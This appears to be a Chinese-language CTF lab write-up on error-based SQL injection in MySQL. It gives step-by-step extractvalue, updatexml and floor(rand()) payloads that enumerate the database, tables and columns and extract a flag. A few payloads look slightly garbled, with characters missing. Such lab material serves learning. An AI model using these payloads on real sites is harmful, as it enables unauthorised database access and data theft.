标签:语句格式 比较 方法 bfd and 一个 个数 hack base
当场景中仅仅将sql语句带入查询返回页面正确,没有返回点的时候,
需要报错注入,用报错的回显。
里面用slect语句,不能用 union select
concat()函数
1.功能:将多个字符串连接成一个字符串。
2.语法:concat(str1, str2,...)
返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。
extractvalue报错注入语句格式:
?id=2 and extractvalue(null,concat(0x7e,(sql语句),0x7e))
?id=2 and extractvalue(null,concat(0x7e,(database()),0x7e))
得到数据库名sqli
?id=2 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘sqli‘limit 0,1),0x7e))
得到第一个表名news
?id=2 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘sqli‘limit 1,1),0x7e))
得到第二个表名flag
?id=2 and extractvalue(null,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘sqli‘and table_name=‘flag‘limit 0,1),0x7e))
得到flag表中第一个字段名为flag
测试 limit 1,1 时无返回所以应该就一个字段
?id=2 and extractvalue(null,concat(0x7e,(select flag from flag limit 0,1),0x7e))
得到一半的flag:ctfhub{d777b4f07afe921643e72497
只显示32位结果,很明显显示的flag不完全,我们需要借助mid函数来进行字符截取从而显示32位以后的数据。
?id=2 and extractvalue(null,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e))
得到最后一半flag:de0a2f07395ef8bb}
合并得到flag ctfhub{d777b4f07afe921643e72497de0a2f07395ef8bb}
和
?id=2+AND+(SELECT+1+FROM+(SELECT+COUNT(),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(flag)+AS+CHAR),0x7e))+FROM+sqli.flag+LIMIT+0,1),FLOOR(RAND(0)2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
对比
合并得到flag ctfhub{d777b4f07afe921643e72497de0a2f07395ef8bb}
?id=2 and (updatexml(1,concat(0x7e,(database()),0x7e),1))
得到数据库sqli
?id=2+and+(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘sqli‘limit 1,1),0x7e),1))
得到表名flag
?id=2+and+(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘sqli‘and table_name=‘flag‘limit 0,1),0x7e),1))
得到列名flag
?id=2+and+(updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1))
得到ctfhub{d777b4f07afe921643e72497
爆后一半同extractvalue方法
?id=2+and+(updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1))
合成得到ctfhub{d777b4f07afe921643e72497de0a2f07395ef8bb}
+AND(SELECT+1+FROM+(SELECT+COUNT(),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
得到数据库 sqli
?id=1+AND(SELECT+1+FROM+(SELECT+COUNT(),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73716c69+LIMIT+0,1),FLOOR(RAND(0)2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
得出第一个表为news 修改为limit 1,1 得出为flag表
?id=1+AND+(SELECT+1+FROM+(SELECT+COUNT(),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x666c6167+AND+table_schema=0x73716c69+LIMIT+0,1),FLOOR(RAND(0)2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
得出列名为flag
?id=1+AND+(SELECT+1+FROM+(SELECT+COUNT(),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(flag)+AS+CHAR),0x7e))+FROM+sqli.flag+LIMIT+0,1),FLOOR(RAND(0)2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
得到ctfhub{27b940d5fcab0bfddfc162ed1b6a95dd9b6de02d}
标签:语句格式 比较 方法 bfd and 一个 个数 hack base
原文地址:https://www.cnblogs.com/threesoil/p/12458580.html